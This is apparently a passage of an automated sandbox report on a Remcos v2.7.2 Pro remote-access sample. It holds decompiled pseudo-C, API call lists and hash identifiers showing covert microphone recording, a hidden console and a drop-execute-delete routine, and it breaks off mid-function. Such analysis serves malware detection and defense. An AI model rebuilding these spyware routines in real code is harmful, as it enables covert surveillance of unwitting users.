                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6F60CB60,?,?,0041225E,?), ref: 00412919
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                        • String ID: ^"A
                                        • API String ID: 1083762089-1057680782
                                        • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                        • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 15%
                                        			E00411C4C(void* __eflags, intOrPtr _a4) {
                                        				char _v20;
                                        				void* _v36;
                                        				char _v52;
                                        				int _t21;
                                        				signed int _t35;
                                        				void* _t39;
                                        				void* _t45;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        				intOrPtr _t67;
                                        				void* _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        				void* _t75;
                                        
                                        				_t75 = __eflags;
                                        				_t67 = _a4;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
                                        				_t21 = SetEvent( *(_t67 + 0x28));
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				_t71 = _t69;
                                        				_t45 = _t71;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(_t75,  &_v20,  &_v52,  &E0041B310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t72 = _t71 + 0x24;
                                        				_t61 =  *_t21 - 0x61;
                                        				if(_t61 == 0) {
                                        					_push(E0040180C( &_v20, __eflags, 2));
                                        					_push(E0040180C( &_v20, __eflags, 1));
                                        					_push(E0040180C( &_v20, __eflags, 0));
                                        					_push(_t72 - 0x10);
                                        					E00411D8A(E00412881(_t29));
                                        				} else {
                                        					_t62 = _t61 - 0x3d;
                                        					if(_t62 == 0) {
                                        						E00411A24(_t45);
                                        					} else {
                                        						_t63 = _t62 - 4;
                                        						if(_t63 == 0) {
                                        							_t35 = E0040180C( &_v20, __eflags, 0);
                                        							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                        							__eflags =  *_t35;
                                        							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
                                        						} else {
                                        							_t64 = _t63 - 3;
                                        							if(_t64 == 0) {
                                        								_t39 =  *0x41c1d4;
                                        								__eflags = _t39;
                                        								if(_t39 != 0) {
                                        									SetEvent(_t39);
                                        								}
                                        							} else {
                                        								_t65 = _t64 - 1;
                                        								if(_t65 == 0) {
                                        									 *0x41c1d2 = 1;
                                        								} else {
                                        									if(_t65 == 1) {
                                        										 *0x41c1d3 = 1;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                        • SetEvent.KERNEL32(?), ref: 00411C6D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 00411C8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • SetEvent.KERNEL32(?), ref: 00411CF8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                        • String ID:
                                        • API String ID: 3236006214-0
                                        • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                        • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 47%
                                        			E00401519(WCHAR* __eax, void* __eflags) {
                                        				char* _t4;
                                        				signed int _t5;
                                        				CHAR* _t10;
                                        				signed int _t11;
                                        				signed int _t19;
                                        				signed int _t20;
                                        				intOrPtr* _t26;
                                        				void* _t27;
                                        
                                        				_t27 = __eflags;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				CreateDirectoryW(__eax, 0);
                                        				0x41b218->wFormatTag = 1;
                                        				 *0x41b21a = 1;
                                        				 *0x41b21c = 0x1f40;
                                        				 *0x41b226 = 8;
                                        				 *0x41b220 = 0x1f40;
                                        				 *0x41b224 = 1;
                                        				 *0x41b228 = 0;
                                        				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t5 = atoi(_t4);
                                        				_t19 =  *0x41b21c; // 0x0
                                        				 *_t26 = 0x30008;
                                        				_t20 = _t19 * _t5 * 0x3c;
                                        				 *0x41b1d0 = _t20;
                                        				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
                                        				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
                                        				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				0x41b1a0->lpData = _t10;
                                        				_t11 =  *0x41b1d8; // 0x0
                                        				 *0x41b1a4 = _t11;
                                        				 *0x41b1a8 = 0;
                                        				 *0x41b1ac = 0;
                                        				 *0x41b1b0 = 0;
                                        				 *0x41b1b4 = 0;
                                        				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                        				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                        				waveInStart( *0x41b210);
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                        • atoi.MSVCRT ref: 0040157F
                                        • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                        • waveInStart.WINMM ref: 00401633
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                        • String ID:
                                        • API String ID: 1097200658-0
                                        • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                        • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                        • SetEvent.KERNEL32(?), ref: 0040F16D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 0040F18E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                          • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                          • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                          • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                          • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                          • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                          • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                          • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                          • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                          • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                        • String ID:
                                        • API String ID: 3444260106-0
                                        • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                        • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E00413D3D(signed int __edx, intOrPtr _a4) {
                                        				void _v1003;
                                        				char _v1004;
                                        				struct HWND__* _t13;
                                        				signed int _t34;
                                        				signed int _t36;
                                        				unsigned int _t40;
                                        				signed int _t41;
                                        				signed int _t47;
                                        				signed int _t50;
                                        				signed int _t56;
                                        				signed int _t59;
                                        				signed int _t64;
                                        				signed int _t65;
                                        				void* _t91;
                                        				void* _t92;
                                        				void* _t93;
                                        
                                        				_t64 = __edx;
                                        				AllocConsole();
                                        				_t13 =  *0x41c1f8();
                                        				 *0x41c1fc = _t13;
                                        				if(_a4 == 0) {
                                        					ShowWindow(_t13, 0);
                                        				}
                                        				freopen("CONOUT$", "a", __imp___iob + 0x20);
                                        				_v1004 = 0;
                                        				memset( &_v1003, 0, 0xf9 << 2);
                                        				asm("stosw");
                                        				asm("stosb");
                                        				_t65 = _t64 | 0xffffffff;
                                        				asm("repne scasb");
                                        				_t40 =  !_t65;
                                        				_t91 = " * Remcos v" - _t40;
                                        				_t41 = _t40 >> 2;
                                        				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                        				asm("repne scasb");
                                        				_t47 =  !_t65;
                                        				_t92 = "2.7.2 Pro" - _t47;
                                        				_t34 = _t47;
                                        				asm("repne scasb");
                                        				_t50 = _t34 >> 2;
                                        				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                        				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                        				asm("repne scasb");
                                        				_t56 =  !_t65;
                                        				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
                                        				_t36 = _t56;
                                        				asm("repne scasb");
                                        				_t59 = _t36 >> 2;
                                        				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                        				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                        				return printf( &_v1004);
                                        			}

                                        APIs
                                        • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                        • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                        • freopen.MSVCRT ref: 00413D7C
                                        • printf.MSVCRT ref: 00413E25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocConsoleShowWindowfreopenprintf
                                        • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                        • API String ID: 3419900118-1124569734
                                        • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                        • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E0040E254(void* __eax, void* __eflags) {
                                        				void* _t7;
                                        				void* _t9;
                                        				void* _t28;
                                        
                                        				_t33 = __eflags;
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
                                        				E004017DD(_t28 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                        • String ID: name
                                        • API String ID: 4248281052-1579384326
                                        • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                        • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E00411AF5(void* __ecx, WCHAR* _a4) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t13;
                                        
